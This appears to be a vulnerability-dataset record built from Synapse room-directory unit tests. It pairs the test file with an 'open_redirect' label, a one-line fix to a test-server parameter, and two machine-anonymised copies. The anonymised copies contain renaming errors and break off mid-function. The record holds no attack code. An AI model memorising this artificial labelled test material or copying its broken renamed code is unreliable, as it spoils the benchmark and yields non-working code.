self.room_list_handler.enable_room_list_search = False
self.directory_handler.enable_room_list_search = False
# Room list disabled so we should get no results
request, channel = self.make_request("GET", b"publicRooms")
self.assertEquals(200, channel.code, channel.result)
self.assertTrue(len(channel.json_body["chunk"]) == 0)
# Room list disabled so we shouldn't be allowed to publish rooms
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT", b"directory/list/room/%s" % (room_id.encode("ascii"),), b"{}"
)
self.assertEquals(403, channel.code, channel.result)
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mock import Mock
import synapse
import synapse.api.errors
from synapse.api.constants import EventTypes
from synapse.config.room_directory import RoomDirectoryConfig
from synapse.rest.client.v1 import directory, login, room
from synapse.types import RoomAlias, create_requester
from tests import unittest
from tests.test_utils import make_awaitable
class DirectoryTestCase(unittest.HomeserverTestCase):
""" Tests the directory service. """
def make_homeserver(self, reactor, clock):
self.mock_federation = Mock()
self.mock_registry = Mock()
self.query_handlers = {}
def register_query_handler(query_type, handler):
self.query_handlers[query_type] = handler
self.mock_registry.register_query_handler = register_query_handler
hs = self.setup_test_homeserver(
federation_http_client=None,
resource_for_federation=Mock(),
federation_client=self.mock_federation,
federation_registry=self.mock_registry,
)
self.handler = hs.get_directory_handler()
self.store = hs.get_datastore()
self.my_room = RoomAlias.from_string("#my-room:test")
self.your_room = RoomAlias.from_string("#your-room:test")
self.remote_room = RoomAlias.from_string("#another:remote")
return hs
def test_get_local_association(self):
self.get_success(
self.store.create_room_alias_association(
self.my_room, "!8765qwer:test", ["test"]
)
)
result = self.get_success(self.handler.get_association(self.my_room))
self.assertEquals({"room_id": "!8765qwer:test", "servers": ["test"]}, result)
def test_get_remote_association(self):
self.mock_federation.make_query.return_value = make_awaitable(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}
)
result = self.get_success(self.handler.get_association(self.remote_room))
self.assertEquals(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}, result
)
self.mock_federation.make_query.assert_called_with(
destination="remote",
query_type="directory",
args={"room_alias": "#another:remote"},
retry_on_dns_fail=False,
ignore_backoff=True,
)
def test_incoming_fed_query(self):
self.get_success(
self.store.create_room_alias_association(
self.your_room, "!8765asdf:test", ["test"]
)
)
response = self.get_success(
self.handler.on_directory_query({"room_alias": "#your-room:test"})
)
self.assertEquals({"room_id": "!8765asdf:test", "servers": ["test"]}, response)
class TestCreateAlias(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.handler = hs.get_directory_handler()
# Create user
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
# Create a test room
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
# Create a test user.
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, user=self.test_user, tok=self.test_user_tok)
def test_create_alias_joined_room(self):
"""A user can create an alias for a room they're in."""
self.get_success(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, self.room_id,
)
)
def test_create_alias_other_room(self):
"""A user cannot create an alias for a room they're NOT in."""
other_room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.get_failure(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, other_room_id,
),
synapse.api.errors.SynapseError,
)
def test_create_alias_admin(self):
"""An admin can create an alias for a room they're NOT in."""
other_room_id = self.helper.create_room_as(
self.test_user, tok=self.test_user_tok
)
self.get_success(
self.handler.create_association(
create_requester(self.admin_user), self.room_alias, other_room_id,
)
)
class TestDeleteAlias(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.handler = hs.get_directory_handler()
self.state_handler = hs.get_state_handler()
# Create user
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
# Create a test room
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
# Create a test user.
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, user=self.test_user, tok=self.test_user_tok)
def _create_alias(self, user):
# Create a new alias to this room.
self.get_success(
self.store.create_room_alias_association(
self.room_alias, self.room_id, ["test"], user
)
)
def test_delete_alias_not_allowed(self):
"""A user that doesn't meet the expected guidelines cannot delete an alias."""
self._create_alias(self.admin_user)
self.get_failure(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
),
synapse.api.errors.AuthError,
)
def test_delete_alias_creator(self):
"""An alias creator can delete their own alias."""
# Create an alias from a different user.
self._create_alias(self.test_user)
# Delete the user's alias.
result = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, result)
# Confirm the alias is gone.
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def test_delete_alias_admin(self):
"""A server admin can delete an alias created by another user."""
# Create an alias from a different user.
self._create_alias(self.test_user)
# Delete the user's alias as the admin.
result = self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
self.assertEquals(self.room_id, result)
# Confirm the alias is gone.
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def test_delete_alias_sufficient_power(self):
"""A user with a sufficient power level should be able to delete an alias."""
self._create_alias(self.admin_user)
# Increase the user's power level.
self.helper.send_state(
self.room_id,
"m.room.power_levels",
{"users": {self.test_user: 100}},
tok=self.admin_user_tok,
)
# They can now delete the alias.
result = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, result)
# Confirm the alias is gone.
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
class CanonicalAliasTestCase(unittest.HomeserverTestCase):
"""Test modifications of the canonical alias when delete aliases.
"""
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.handler = hs.get_directory_handler()
self.state_handler = hs.get_state_handler()
# Create user
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
# Create a test room
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = self._add_alias(self.test_alias)
def _add_alias(self, alias: str) -> RoomAlias:
"""Add an alias to the test room."""
room_alias = RoomAlias.from_string(alias)
# Create a new alias to this room.
self.get_success(
self.store.create_room_alias_association(
room_alias, self.room_id, ["test"], self.admin_user
)
)
return room_alias
def _set_canonical_alias(self, content):
"""Configure the canonical alias state on the room."""
self.helper.send_state(
self.room_id, "m.room.canonical_alias", content, tok=self.admin_user_tok,
)
def _get_canonical_alias(self):
"""Get the canonical alias state of the room."""
return self.get_success(
self.state_handler.get_current_state(
self.room_id, EventTypes.CanonicalAlias, ""
)
)
def test_remove_alias(self):
"""Removing an alias that is the canonical alias should remove it there too."""
# Set this new alias as the canonical alias for this room
self._set_canonical_alias(
{"alias": self.test_alias, "alt_aliases": [self.test_alias]}
)
data = self._get_canonical_alias()
self.assertEqual(data["content"]["alias"], self.test_alias)
self.assertEqual(data["content"]["alt_aliases"], [self.test_alias])
# Finally, delete the alias.
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
data = self._get_canonical_alias()
self.assertNotIn("alias", data["content"])
self.assertNotIn("alt_aliases", data["content"])
def test_remove_other_alias(self):
"""Removing an alias listed as in alt_aliases should remove it there too."""
# Create a second alias.
other_test_alias = "#test2:test"
other_room_alias = self._add_alias(other_test_alias)
# Set the alias as the canonical alias for this room.
self._set_canonical_alias(
{
"alias": self.test_alias,
"alt_aliases": [self.test_alias, other_test_alias],
}
)
data = self._get_canonical_alias()
self.assertEqual(data["content"]["alias"], self.test_alias)
self.assertEqual(
data["content"]["alt_aliases"], [self.test_alias, other_test_alias]
)
# Delete the second alias.
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), other_room_alias
)
)
data = self._get_canonical_alias()
self.assertEqual(data["content"]["alias"], self.test_alias)
self.assertEqual(data["content"]["alt_aliases"], [self.test_alias])
class TestCreateAliasACL(unittest.HomeserverTestCase):
user_id = "@test:test"
servlets = [directory.register_servlets, room.register_servlets]
def prepare(self, reactor, clock, hs):
# We cheekily override the config to add custom alias creation rules
config = {}
config["alias_creation_rules"] = [
{"user_id": "*", "alias": "#unofficial_*", "action": "allow"}
]
config["room_list_publication_rules"] = []
rd_config = RoomDirectoryConfig()
rd_config.read_config(config)
self.hs.config.is_alias_creation_allowed = rd_config.is_alias_creation_allowed
return hs
def test_denied(self):
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT",
b"directory/room/%23test%3Atest",
('{"room_id":"%s"}' % (room_id,)).encode("ascii"),
)
self.assertEquals(403, channel.code, channel.result)
def test_allowed(self):
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT",
b"directory/room/%23unofficial_test%3Atest",
('{"room_id":"%s"}' % (room_id,)).encode("ascii"),
)
self.assertEquals(200, channel.code, channel.result)
class TestRoomListSearchDisabled(unittest.HomeserverTestCase):
user_id = "@test:test"
servlets = [directory.register_servlets, room.register_servlets]
def prepare(self, reactor, clock, hs):
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT", b"directory/list/room/%s" % (room_id.encode("ascii"),), b"{}"
)
self.assertEquals(200, channel.code, channel.result)
self.room_list_handler = hs.get_room_list_handler()
self.directory_handler = hs.get_directory_handler()
return hs
def test_disabling_room_list(self):
self.room_list_handler.enable_room_list_search = True
self.directory_handler.enable_room_list_search = True
# Room list is enabled so we should get some results
request, channel = self.make_request("GET", b"publicRooms")
self.assertEquals(200, channel.code, channel.result)
self.assertTrue(len(channel.json_body["chunk"]) > 0)
self.room_list_handler.enable_room_list_search = False
self.directory_handler.enable_room_list_search = False
# Room list disabled so we should get no results
request, channel = self.make_request("GET", b"publicRooms")
self.assertEquals(200, channel.code, channel.result)
self.assertTrue(len(channel.json_body["chunk"]) == 0)
# Room list disabled so we shouldn't be allowed to publish rooms
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT", b"directory/list/room/%s" % (room_id.encode("ascii"),), b"{}"
)
self.assertEquals(403, channel.code, channel.result)
| open_redirect | {
"code": [
" http_client=None,"
],
"line_no": [
45
]
} | {
"code": [
" federation_http_client=None,"
],
"line_no": [
45
]
} |
from mock import Mock
import synapse
import synapse.api.errors
from synapse.api.constants import EventTypes
from synapse.config.room_directory import RoomDirectoryConfig
from synapse.rest.client.v1 import directory, login, room
from synapse.types import RoomAlias, create_requester
from tests import unittest
from tests.test_utils import make_awaitable
class CLASS_0(unittest.HomeserverTestCase):
def FUNC_0(self, VAR_0, VAR_1):
self.mock_federation = Mock()
self.mock_registry = Mock()
self.query_handlers = {}
def FUNC_21(VAR_8, VAR_9):
self.query_handlers[VAR_8] = VAR_9
self.mock_registry.register_query_handler = FUNC_21
VAR_3 = self.setup_test_homeserver(
http_client=None,
resource_for_federation=Mock(),
federation_client=self.mock_federation,
federation_registry=self.mock_registry,
)
self.handler = VAR_3.get_directory_handler()
self.store = VAR_3.get_datastore()
self.my_room = RoomAlias.from_string("#my-room:test")
self.your_room = RoomAlias.from_string("#your-room:test")
self.remote_room = RoomAlias.from_string("#another:remote")
return VAR_3
def FUNC_1(self):
self.get_success(
self.store.create_room_alias_association(
self.my_room, "!8765qwer:test", ["test"]
)
)
VAR_10 = self.get_success(self.handler.get_association(self.my_room))
self.assertEquals({"room_id": "!8765qwer:test", "servers": ["test"]}, VAR_10)
def FUNC_2(self):
self.mock_federation.make_query.return_value = make_awaitable(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}
)
VAR_10 = self.get_success(self.handler.get_association(self.remote_room))
self.assertEquals(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}, VAR_10
)
self.mock_federation.make_query.assert_called_with(
destination="remote",
VAR_8="directory",
args={"room_alias": "#another:remote"},
retry_on_dns_fail=False,
ignore_backoff=True,
)
def FUNC_3(self):
self.get_success(
self.store.create_room_alias_association(
self.your_room, "!8765asdf:test", ["test"]
)
)
VAR_11 = self.get_success(
self.handler.on_directory_query({"room_alias": "#your-room:test"})
)
self.assertEquals({"room_id": "!8765asdf:test", "servers": ["test"]}, VAR_11)
class CLASS_1(unittest.HomeserverTestCase):
VAR_2 = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def FUNC_4(self, VAR_0, VAR_1, VAR_3):
self.handler = VAR_3.get_directory_handler()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, VAR_4=self.test_user, tok=self.test_user_tok)
def FUNC_5(self):
self.get_success(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, self.room_id,
)
)
def FUNC_6(self):
VAR_12 = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.get_failure(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, VAR_12,
),
synapse.api.errors.SynapseError,
)
def FUNC_7(self):
VAR_12 = self.helper.create_room_as(
self.test_user, tok=self.test_user_tok
)
self.get_success(
self.handler.create_association(
create_requester(self.admin_user), self.room_alias, VAR_12,
)
)
class CLASS_2(unittest.HomeserverTestCase):
VAR_2 = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def FUNC_4(self, VAR_0, VAR_1, VAR_3):
self.store = VAR_3.get_datastore()
self.handler = VAR_3.get_directory_handler()
self.state_handler = VAR_3.get_state_handler()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, VAR_4=self.test_user, tok=self.test_user_tok)
def FUNC_8(self, VAR_4):
self.get_success(
self.store.create_room_alias_association(
self.room_alias, self.room_id, ["test"], VAR_4
)
)
def FUNC_9(self):
self._create_alias(self.admin_user)
self.get_failure(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
),
synapse.api.errors.AuthError,
)
def FUNC_10(self):
self._create_alias(self.test_user)
VAR_10 = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, VAR_10)
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def FUNC_11(self):
self._create_alias(self.test_user)
VAR_10 = self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
self.assertEquals(self.room_id, VAR_10)
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def FUNC_12(self):
self._create_alias(self.admin_user)
self.helper.send_state(
self.room_id,
"m.room.power_levels",
{"users": {self.test_user: 100}},
tok=self.admin_user_tok,
)
VAR_10 = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, VAR_10)
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
class CLASS_3(unittest.HomeserverTestCase):
VAR_2 = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def FUNC_4(self, VAR_0, VAR_1, VAR_3):
self.store = VAR_3.get_datastore()
self.handler = VAR_3.get_directory_handler()
self.state_handler = VAR_3.get_state_handler()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = self._add_alias(self.test_alias)
def FUNC_13(self, VAR_5: str) -> RoomAlias:
VAR_13 = RoomAlias.from_string(VAR_5)
self.get_success(
self.store.create_room_alias_association(
VAR_13, self.room_id, ["test"], self.admin_user
)
)
return VAR_13
def FUNC_14(self, VAR_6):
self.helper.send_state(
self.room_id, "m.room.canonical_alias", VAR_6, tok=self.admin_user_tok,
)
def FUNC_15(self):
return self.get_success(
self.state_handler.get_current_state(
self.room_id, EventTypes.CanonicalAlias, ""
)
)
def FUNC_16(self):
self._set_canonical_alias(
{"alias": self.test_alias, "alt_aliases": [self.test_alias]}
)
VAR_14 = self._get_canonical_alias()
self.assertEqual(VAR_14["content"]["alias"], self.test_alias)
self.assertEqual(VAR_14["content"]["alt_aliases"], [self.test_alias])
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
VAR_14 = self._get_canonical_alias()
self.assertNotIn("alias", VAR_14["content"])
self.assertNotIn("alt_aliases", VAR_14["content"])
def FUNC_17(self):
VAR_15 = "#test2:test"
VAR_16 = self._add_alias(VAR_15)
self._set_canonical_alias(
{
"alias": self.test_alias,
"alt_aliases": [self.test_alias, VAR_15],
}
)
VAR_14 = self._get_canonical_alias()
self.assertEqual(VAR_14["content"]["alias"], self.test_alias)
self.assertEqual(
VAR_14["content"]["alt_aliases"], [self.test_alias, VAR_15]
)
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), VAR_16
)
)
VAR_14 = self._get_canonical_alias()
self.assertEqual(VAR_14["content"]["alias"], self.test_alias)
self.assertEqual(VAR_14["content"]["alt_aliases"], [self.test_alias])
class CLASS_4(unittest.HomeserverTestCase):
VAR_7 = "@test:test"
VAR_2 = [directory.register_servlets, room.register_servlets]
def FUNC_4(self, VAR_0, VAR_1, VAR_3):
VAR_17 = {}
config["alias_creation_rules"] = [
{"user_id": "*", "alias": "#unofficial_*", "action": "allow"}
]
VAR_17["room_list_publication_rules"] = []
VAR_18 = RoomDirectoryConfig()
VAR_18.read_config(VAR_17)
self.hs.config.is_alias_creation_allowed = VAR_18.is_alias_creation_allowed
return VAR_3
def FUNC_18(self):
VAR_19 = self.helper.create_room_as(self.user_id)
VAR_20, VAR_21 = self.make_request(
"PUT",
b"directory/room/%23test%3Atest",
('{"room_id":"%s"}' % (VAR_19,)).encode("ascii"),
)
self.assertEquals(403, VAR_21.code, VAR_21.result)
def FUNC_19(self):
VAR_19 = self.helper.create_room_as(self.user_id)
VAR_20, VAR_21 = self.make_request(
"PUT",
b"directory/room/%23unofficial_test%3Atest",
('{"room_id":"%s"}' % (VAR_19,)).encode("ascii"),
)
self.assertEquals(200, VAR_21.code, VAR_21.result)
class CLASS_5(unittest.HomeserverTestCase):
VAR_7 = "@test:test"
VAR_2 = [directory.register_servlets, room.register_servlets]
def FUNC_4(self, VAR_0, VAR_1, VAR_3):
VAR_19 = self.helper.create_room_as(self.user_id)
VAR_20, VAR_21 = self.make_request(
"PUT", b"directory/list/room/%s" % (VAR_19.encode("ascii"),), b"{}"
)
self.assertEquals(200, VAR_21.code, VAR_21.result)
self.room_list_handler = VAR_3.get_room_list_handler()
self.directory_handler = VAR_3.get_directory_handler()
return VAR_3
def FUNC_20(self):
self.room_list_handler.enable_room_list_search = True
self.directory_handler.enable_room_list_search = True
VAR_20, VAR_21 = self.make_request("GET", b"publicRooms")
self.assertEquals(200, VAR_21.code, VAR_21.result)
self.assertTrue(len(VAR_21.json_body["chunk"]) > 0)
self.room_list_handler.enable_room_list_search = False
self.directory_handler.enable_room_list_search = False
VAR_20, VAR_21 = self.make_request("GET", b"publicRooms")
self.assertEquals(200, VAR_21.code, VAR_21.result)
self.assertTrue(len(VAR_21.json_body["chunk"]) == 0)
VAR_19 = self.helper.create_room_as(self.user_id)
VAR_20, VAR_21 = self.make_request(
"PUT", b"directory/list/room/%s" % (VAR_19.encode("ascii"),), b"{}"
)
self.assertEquals(403, VAR_21.code, VAR_21.result)
|
from mock import Mock
import synapse
import synapse.api.errors
from synapse.api.constants import EventTypes
from synapse.config.room_directory import RoomDirectoryConfig
from synapse.rest.client.v1 import directory, login, room
from synapse.types import RoomAlias, create_requester
from tests import unittest
from tests.test_utils import make_awaitable
class CLASS_0(unittest.HomeserverTestCase):
def FUNC_0(self, VAR_0, VAR_1):
self.mock_federation = Mock()
self.mock_registry = Mock()
self.query_handlers = {}
def FUNC_21(VAR_8, VAR_9):
self.query_handlers[VAR_8] = VAR_9
self.mock_registry.register_query_handler = FUNC_21
VAR_3 = self.setup_test_homeserver(
federation_http_client=None,
resource_for_federation=Mock(),
federation_client=self.mock_federation,
federation_registry=self.mock_registry,
)
self.handler = VAR_3.get_directory_handler()
self.store = VAR_3.get_datastore()
self.my_room = RoomAlias.from_string("#my-room:test")
self.your_room = RoomAlias.from_string("#your-room:test")
self.remote_room = RoomAlias.from_string("#another:remote")
return VAR_3
def FUNC_1(self):
self.get_success(
self.store.create_room_alias_association(
self.my_room, "!8765qwer:test", ["test"]
)
)
VAR_10 = self.get_success(self.handler.get_association(self.my_room))
self.assertEquals({"room_id": "!8765qwer:test", "servers": ["test"]}, VAR_10)
def FUNC_2(self):
self.mock_federation.make_query.return_value = make_awaitable(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}
)
VAR_10 = self.get_success(self.handler.get_association(self.remote_room))
self.assertEquals(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}, VAR_10
)
self.mock_federation.make_query.assert_called_with(
destination="remote",
VAR_8="directory",
args={"room_alias": "#another:remote"},
retry_on_dns_fail=False,
ignore_backoff=True,
)
def FUNC_3(self):
self.get_success(
self.store.create_room_alias_association(
self.your_room, "!8765asdf:test", ["test"]
)
)
VAR_11 = self.get_success(
self.handler.on_directory_query({"room_alias": "#your-room:test"})
)
self.assertEquals({"room_id": "!8765asdf:test", "servers": ["test"]}, VAR_11)
class CLASS_1(unittest.HomeserverTestCase):
VAR_2 = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def FUNC_4(self, VAR_0, VAR_1, VAR_3):
self.handler = VAR_3.get_directory_handler()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, VAR_4=self.test_user, tok=self.test_user_tok)
def FUNC_5(self):
self.get_success(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, self.room_id,
)
)
def FUNC_6(self):
VAR_12 = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.get_failure(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, VAR_12,
),
synapse.api.errors.SynapseError,
)
def FUNC_7(self):
VAR_12 = self.helper.create_room_as(
self.test_user, tok=self.test_user_tok
)
self.get_success(
self.handler.create_association(
create_requester(self.admin_user), self.room_alias, VAR_12,
)
)
class CLASS_2(unittest.HomeserverTestCase):
VAR_2 = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def FUNC_4(self, VAR_0, VAR_1, VAR_3):
self.store = VAR_3.get_datastore()
self.handler = VAR_3.get_directory_handler()
self.state_handler = VAR_3.get_state_handler()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, VAR_4=self.test_user, tok=self.test_user_tok)
def FUNC_8(self, VAR_4):
self.get_success(
self.store.create_room_alias_association(
self.room_alias, self.room_id, ["test"], VAR_4
)
)
def FUNC_9(self):
self._create_alias(self.admin_user)
self.get_failure(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
),
synapse.api.errors.AuthError,
)
def FUNC_10(self):
self._create_alias(self.test_user)
VAR_10 = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, VAR_10)
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def FUNC_11(self):
self._create_alias(self.test_user)
VAR_10 = self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
self.assertEquals(self.room_id, VAR_10)
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def FUNC_12(self):
self._create_alias(self.admin_user)
self.helper.send_state(
self.room_id,
"m.room.power_levels",
{"users": {self.test_user: 100}},
tok=self.admin_user_tok,
)
VAR_10 = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, VAR_10)
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
class CLASS_3(unittest.HomeserverTestCase):
VAR_2 = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def FUNC_4(self, VAR_0, VAR_1, VAR_3):
self.store = VAR_3.get_datastore()
self.handler = VAR_3.get_directory_handler()
self.state_handler = VAR_3.get_state_handler()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = self._add_alias(self.test_alias)
def FUNC_13(self, VAR_5: str) -> RoomAlias:
VAR_13 = RoomAlias.from_string(VAR_5)
self.get_success(
self.store.create_room_alias_association(
VAR_13, self.room_id, ["test"], self.admin_user
)
)
return VAR_13
def FUNC_14(self, VAR_6):
self.helper.send_state(
self.room_id, "m.room.canonical_alias", VAR_6, tok=self.admin_user_tok,
)
def FUNC_15(self):
return self.get_success(
self.state_handler.get_current_state(
self.room_id, EventTypes.CanonicalAlias, ""
)
)
def FUNC_16(self):
self._set_canonical_alias(
{"alias": self.test_alias, "alt_aliases": [self.test_alias]}
)
VAR_14 = self._get_canonical_alias()
self.assertEqual(VAR_14["content"]["alias"], self.test_alias)
self.assertEqual(VAR_14["content"]["alt_aliases"], [self.test_alias])
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
VAR_14 = self._get_canonical_alias()
self.assertNotIn("alias", VAR_14["content"])
self.assertNotIn("alt_aliases", VAR_14["content"])
def FUNC_17(self):
VAR_15 = "#test2:test"
VAR_16 = self._add_alias(VAR_15)
self._set_canonical_alias(
{
"alias": self.test_alias,
"alt_aliases": [self.test_alias, VAR_15],
}
)
VAR_14 = self._get_canonical_alias()
self.assertEqual(VAR_14["content"]["alias"], self.test_alias)
self.assertEqual(
VAR_14["content"]["alt_aliases"], [self.test_alias, VAR_15]
)
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), VAR_16
)
)
VAR_14 = self._get_canonical_alias()
self.assertEqual(VAR_14["content"]["alias"], self.test_alias)
self.assertEqual(VAR_14["content"]["alt_aliases"], [self.test_alias])
class CLASS_4(unittest.HomeserverTestCase):
VAR_7 = "@test:test"
VAR_2 = [directory.register_servlets, room.register_servlets]
def FUNC_4(self, VAR_0, VAR_1, VAR_3):
VAR_17 = {}
config["alias_creation_rules"] = [
{"user_id": "*", "alias": "#unofficial_*", "action": "allow"}
]
VAR_17["room_list_publication_rules"] = []
VAR_18 = RoomDirectoryConfig()
VAR_18.read_config(VAR_17)
self.hs.config.is_alias_creation_allowed = VAR_18.is_alias_creation_allowed
return VAR_3
def FUNC_18(self):
VAR_19 = self.helper.create_room_as(self.user_id)
VAR_20, VAR_21 = self.make_request(
"PUT",
b"directory/room/%23test%3Atest",
('{"room_id":"%s"}' % (VAR_19,)).encode("ascii"),
)
self.assertEquals(403, VAR_21.code, VAR_21.result)
def FUNC_19(self):
VAR_19 = self.helper.create_room_as(self.user_id)
VAR_20, VAR_21 = self.make_request(
"PUT",
b"directory/room/%23unofficial_test%3Atest",
('{"room_id":"%s"}' % (VAR_19,)).encode("ascii"),
)
self.assertEquals(200, VAR_21.code, VAR_21.result)
class CLASS_5(unittest.HomeserverTestCase):
VAR_7 = "@test:test"
VAR_2 = [directory.register_servlets, room.register_servlets]
def FUNC_4(self, VAR_0, VAR_1, VAR_3):
VAR_19 = self.helper.create_room_as(self.user_id)
VAR_20, VAR_21 = self.make_request(
"PUT", b"directory/list/room/%s" % (VAR_19.encode("ascii"),), b"{}"
)
self.assertEquals(200, VAR_21.code, VAR_21.result)
self.room_list_handler = VAR_3.get_room_list_handler()
self.directory_handler = VAR_3.get_directory_handler()
return VAR_3
def FUNC_20(self):
